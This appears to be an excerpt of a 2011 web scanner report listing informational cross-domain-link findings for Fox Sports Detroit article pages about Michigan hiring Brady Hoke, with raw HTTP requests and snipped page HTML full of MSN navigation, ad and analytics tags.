<a href="javascript:void(window.open('http://www.platformic.com'));"><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/266/191108.jpg" alt="" alignment="texttop" border="0" hspace="" vspace=""></a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.msn.com/0TO_/enus">Legal</a></li><li><a href="http://advertising.msn.com/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="http://rss.msn.com">RSS</a>
...[SNIP]...
<li class="first"><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

5.2. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/Hoke-who/landing.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /01/11/11/Hoke-who/landing.html?blockID=389355&feedID=3701 HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:23:05 GMT
Server: Apache
Set-Cookie: PHPSESSID=85ff0994810525300d4e54d63c899e70; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 66884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<link rel="image_src" href="http://www.foxsportsdetroit.com/common/medialib/267/286104_thumb.jpg" />
<link href="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appcss/~1294849066/l=default~landing~menz1191~menz1201~horizontal_tabs_498~horizontal_tabs_626~custom_classes~component_masthead~component_right_generic~component_footer/g=style/ucdn=1" rel="stylesheet" type="text/css" />

<!--<script language="javascript">
...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appjs/~1294849066/s=main~thePlatform^swfobject~ugc~comment_box/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<span class="msnlogo_top"><a href="http://www.msn.com"><img id="msnlogo" src="http://blstc.msn.com/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to MSN.com" alt="go to MSN.com" /></a>
...[SNIP]...
<li class="c1"><a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.msn.com/">Celebrities</a>
...[SNIP]...
<li class="new"><a href="http://thebubble.msn.com/ "><strong>
...[SNIP]...
<li><a href="http://entertainment.msn.com/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.msn.com/"> TV</a></li><li><a href="http://entertainment.msn.com/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c2"><a href="http://moneycentral.msn.com/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.msn.com/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.msn.com/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c3"><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.msn.com/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.msn.com/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.msn.com/">Glo</a></li><li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.msn.com/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.msn.com/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268"><strong>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.msn.com/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.msn.com">Horoscopes</a></li><li><a href="http://realestate.msn.com/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.msn.com/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=FOXSP">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div class="selected"><a id="sslink" href="http://msn.foxsports.com/search">Search FS Detroit</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the Web</a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/7538.jpg border=0></a>
<div>
<a href='http://www.foxsportsarizona.com' target = '_blank' >FS Arizona</a>
<a href='http://www.foxsportscarolinas.com' target = '_blank' >FS Carolinas</a>
...[SNIP]...
</a>
<a href='http://www.foxsportsflorida.com' target = '_blank' >FS Florida</a>
<a href='http://www.foxsportshouston.com' target = '_blank' >FS Houston</a>
<a href='http://www.foxsportskansascity.com' target = '_blank' >FS Kansas City</a>
<a href='http://www.foxsportsmidwest.com' target = '_blank' >FS Midwest</a>
<a href='http://www.foxsportsnorth.com' target = '_blank' >FS North</a>
<a href='http://www.foxsportsohio.com' target = '_blank' >FS Ohio</a>
<a href='http://www.foxsportssouth.com' target = '_blank' >FS South</a>
<a href='http://www.foxsportssouthwest.com' target = '_blank' >FS Southwest</a>
<a href='http://www.foxsportstennessee.com' target = '_blank' >FS Tennessee</a>
<a href='http://www.foxsportswest.com' target = '_blank' >FS West</a>
<a href='http://www.foxsportswisconsin.com' target = '_blank' >FS Wisconsin</a>
<a href='http://www.nesn.com' target = '_blank' >NESN Boston</a>
...[SNIP]...
<a href='/pages/redwings' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/7697.jpg border=0></a>
<div>
<a href='http://foxsportsdetroit.stats.com/nhl/teamstats.asp?teamno=05&btnGo=Go&type=teamhome' target = '_blank' >Team Page</a>
<a href='http://foxsportsdetroit.stats.com/nhl/teamstats.asp?teamno=05&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsdetroit.stats.com/nhl/standings_conference.asp' target = '_blank' >Standings</a>
...[SNIP]...
</a>
<a href='http://foxsportsdetroit.stats.com/nhl/scoreboard.asp' target = '_blank' >Scores</a>
...[SNIP]...
<a href='/pages/pistons' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/7698.jpg border=0></a>
<div>
<a href='http://foxsportsdetroit.stats.com/nba/teamstats.asp?teamno=08&btnGo=Go&type=teamhome' target = '_blank' >Team Page</a>
<a href='http://foxsportsdetroit.stats.com/nba/teamstats.asp?teamno=08&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsdetroit.stats.com/nba/standings_conference.asp' target = '_blank' >Standings</a>
...[SNIP]...
</a>
<a href='http://foxsportsdetroit.stats.com/nba/scoreboard.asp' target = '_blank' >Scores</a>
...[SNIP]...
<a href='/pages/tigers' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/7700.jpg border=0></a>
<div>
<a href='http://foxsportsdetroit.stats.com/mlb/teamreports.asp?tm=06&report=teamhome' target = '_blank' >Team Page</a>
<a href='http://foxsportsdetroit.stats.com/mlb/teamreports.asp?tm=06&report=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsdetroit.stats.com/mlb/standings.asp' target = '_blank' >Standings</a>
...[SNIP]...
</a>
<a href='http://foxsportsdetroit.stats.com/mlb/scoreboard.asp' target = '_blank' >Scores</a>
...[SNIP]...
<a href='/pages/lions' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/8162.jpg border=0></a>
<div>
<a href='http://foxsportsdetroit.stats.com/fb/teamstats.asp?tm=08' target = '_blank' >Team Page</a>
<a href='http://foxsportsdetroit.stats.com/fb/teamstats.asp?yr=2010&tm=8&btnGo=Go&type=schedules' target = '_blank' >Schedule</a>
<a href='http://foxsportsdetroit.stats.com/fb/totalstandings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsdetroit.stats.com/fb/scoreboard.asp' target = '_blank' >Scores</a>
...[SNIP]...
<a href='/pages/um' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/8166.jpg border=0></a>
<div>
<a href='http://foxsportsdetroit.stats.com/cbk/teamstats.asp?team=357&report=teamhome' target = '_blank' >Team Page </a>
<a href='http://foxsportsdetroit.stats.com/cbk/teamstats.asp?team=357&report=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsdetroit.stats.com/cbk/teamstats.asp?team=357&report=stats' target = '_blank' >Stats</a>
...[SNIP]...
</a>
<a href='http://foxsportsdetroit.stats.com/cbk/polls.asp' target = '_blank' >Polls</a>
</div><a href='/pages/msu' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/8165.jpg border=0></a>
<div>
<a href='http://foxsportsdetroit.stats.com/cbk/teamstats.asp?team=0358&report=teamhome' target = '_blank' >Team Page</a>
<a href='http://foxsportsdetroit.stats.com/cbk/teamstats.asp?team=358&report=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsdetroit.stats.com/cbk/teamstats.asp?team=358&report=stats' target = '_blank' >Stats</a>
...[SNIP]...
</a>
<a href='http://foxsportsdetroit.stats.com/cbk/polls.asp' target = '_blank' >Polls</a>
</div><a href='/pages/aprilinthed' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/16510.jpg border=0></a>
<a href='http://foxsportsdetroit.com/pages/main' target = '_self' ><IMG SRC=http://wac.2532.edgecastcdn.net/802532/foxdetro/menu_images/9571.jpg border=0></a>
...[SNIP]...
<a href="/pages/main"><img src="http://wac.2532.edgecastcdn.net/802532/foxariz/navtrans1.gif" alt="" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849838?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849838?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849838?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' border=0> <a href="#cmnta_389355">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/email.png' border=0> <a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/11/11/Hoke-who/landing.html?blockID=389355^feedID=3701^',300,500);" rel="nofollow">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/print.png' border=0> <a href="/pages/print_landing?blockID=389355&feedID=3701&" target=_blank rel="nofollow">
...[SNIP]...
php?u=' + encodeURIComponent(document.location) + '&t=' + encodeURIComponent('Hoke who? Anonymity of hire an issue for Michigan') ,'sharer','toolbar=0,status=0,width=626,height=436'));" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png' height=16 width=16 border=0 onMouseOver="codeHint(1,'Share on Facebook');" onMouseOut="codeHint(-1);" > Facebook</a>
...[SNIP]...
</div>

<a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="http://www.foxsportsdetroit.com/common/dynrss/dynrss_3701_landing_.rss" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png' height=16 width=16 border=0 ></a>
...[SNIP]...
<p style='width:665px;text-align:center'><img src='http://wac.2532.edgecastcdn.net/802532/foxdetro/common/medialib/267/215842.jpg'></p>
...[SNIP]...
<div class='sidebar_230'>
<IMG SRC="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/medialib/267/360624.jpg" width="230" ><br>
...[SNIP]...
<br>-- <a href="http://www.fsdetroit.com/01/11/11/Michigan-names-Brady-Hoke-as-its-new-foo/landing.html?blockID=389248&amp;feedID=3701">Michigan names Brady Hoke as its new football coach</a>
...[SNIP]...
<div class='sidebar_230'>
<a href="http://msn.foxsports.com/collegefootball" target="new"><center><img src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/medialib/267/334026.jpg" alignment="non" border="0"></center></a>Get all your national college football news and features at FOXSports.com's <a href="http://msn.foxsports.com/collegefootball" target="new"><b>
...[SNIP]...
<a href="http://www.foxsportsdetroit.com/pages/streaming"><img src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/medialib/267/361273.jpg" alt="stream_story.jpg" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<a href="http://www.foxsportsdetroit.com/pages/wingsschedule"><img src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/medialib/267/359497.jpg" alt="0114blujackets_wingsfri.jpg" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<a href="/pages/mcdonalds_pog"><img src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/medialib/267/356654.jpg" alt="mcdonaldPOGside.jpg" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849838?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849838?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849838?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<a href='/common/ad_count.php?segmentID=8658' target='_blank'><IMG SRC='http://wac.2532.edgecastcdn.net/802532/foxdetro/common/ad_media/274/adserver_4735.gif' width='88' height='31' border=0></a>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(15)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(5)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<div class = 'redbullet'>
<a href="http://www.nhl.com/ice/page.htm?id=66980">Detroit's Lidstrom makes All-Star roster</a>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/miami-heat-cleveland-cavaliers-lebron-james-tweets-insult-to-former-team-011111
" target='_blank'>
LeBron rips Cavs via Twitter
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/page/heat-or-threepeat
" target='_blank'>
Heat or 3Peat
</a>
...[SNIP]...
<li><a href="http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566&feedID=3709
" target='_blank'>
Lakers crush Cavs in historic fashion
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Los-Angeles-Lakers-Kobe-Bryant-blast-Cleveland-Cavaliers-by-55-for-fifth-straight-win-011111
" target='_blank'>
Lakers hand Cavs 11th straight loss
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Michigan-names-Brady-Hoke-next-head-football-coach-011111
" target='_blank'>
Michigan hires Hoke as football coach
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/page/nfl-weekly-review-2010
" target='_blank'>
Redirect NFL Weekly Preview
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/NFL-playoff-picture-scenarios-2010
" target='_blank'>
NFL playoff schedule
</a>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(1)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(5)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(12)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(15)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<td align="left" valign="top"><a

href="http://www.foxsportsarizona.com"

target="_blank">
FOX Sports Arizona</a><br>

<a href="http://www.foxsportscarolinas.com"

target="_blank">
FOX Sports Carolinas</a>
...[SNIP]...
<br>

<a href="http://www.foxsportsflorida.com"

target="_blank">
FOX Sports Florida</a><br>

<a href="http://www.foxsportshouston.com"

target="_blank">
FOX Sports Houston</a><br>

<a href="http://www.foxsportskansascity.com"

target="_blank">
FOX Sports Kansas City</a><br>

<a href="http://www.foxsportsmidwest.com"

target="_blank">
FOX Sports Midwest</a><br>
<a

href="http://www.foxsportsnorth.com"

target="_blank">
FOX Sports North</a>
...[SNIP]...
<td align="left" valign"top"><a href="http://www.foxsportsohio.com"

target="_blank">
FOX Sports Ohio</a><br>

<a href="http://www.foxsportssouth.com"

target="_blank">
FOX Sports South</a><br>

<a href="http://www.foxsportssouthwest.com"

target="_blank">
FOX Sports Southwest</a><br>

<a href="http://www.foxsportstennessee.com"

target="_blank">
FOX Sports Tennessee</a><br>

<a href="http://www.foxsportswest.com"

target="_blank">
FOX Sports West</a><br>

<a href="http://www.foxsportswisconsin.com"

target="_blank">
FOX Sports

Wisconsin</a><br>
<a href="http://www.nesn.com"

target="_blank">
NESN Boston</a>
...[SNIP]...
</a> | <a target="_blank" href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-0-0-0-0-0-0&amp;pid=foxsports'">Tickets</a>
...[SNIP]...
<a href="javascript:void(window.open('http://www.platformic.com'));"><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/266/191108.jpg" alt="" alignment="texttop" border="0" hspace="" vspace=""></a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.msn.com/0TO_/enus">Legal</a></li><li><a href="http://advertising.msn.com/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="http://rss.msn.com">RSS</a>
...[SNIP]...
<li class="first"><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

5.3. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html?blockID=389326&feedID=3701 HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=539c0237c90a637a856e33299aeaf9bb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<link rel="image_src" href="http://www.foxsportsdetroit.com/common/medialib/267/286109_thumb.jpg" />
<link href="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appcss/~1294849066/l=default~landing~menz1191~menz1201~horizontal_tabs_498~horizontal_tabs_626~custom_classes~component_masthead~component_right_generic~component_footer/g=style/ucdn=1" rel="stylesheet" type="text/css" />

<!--<script language="javascript">
...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appjs/~1294849066/s=main~thePlatform^swfobject~ugc~comment_box/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<span class="msnlogo_top"><a href="http://www.msn.com"><img id="msnlogo" src="http://blstc.msn.com/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to MSN.com" alt="go to MSN.com" /></a>
...[SNIP]...
<li class="c1"><a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.msn.com/">Celebrities</a>
...[SNIP]...
<li class="new"><a href="http://thebubble.msn.com/ "><strong>
...[SNIP]...
<li><a href="http://entertainment.msn.com/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.msn.com/"> TV</a></li><li><a href="http://entertainment.msn.com/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c2"><a href="http://moneycentral.msn.com/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.msn.com/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.msn.com/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c3"><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.msn.com/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.msn.com/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.msn.com/">Glo</a></li><li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.msn.com/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
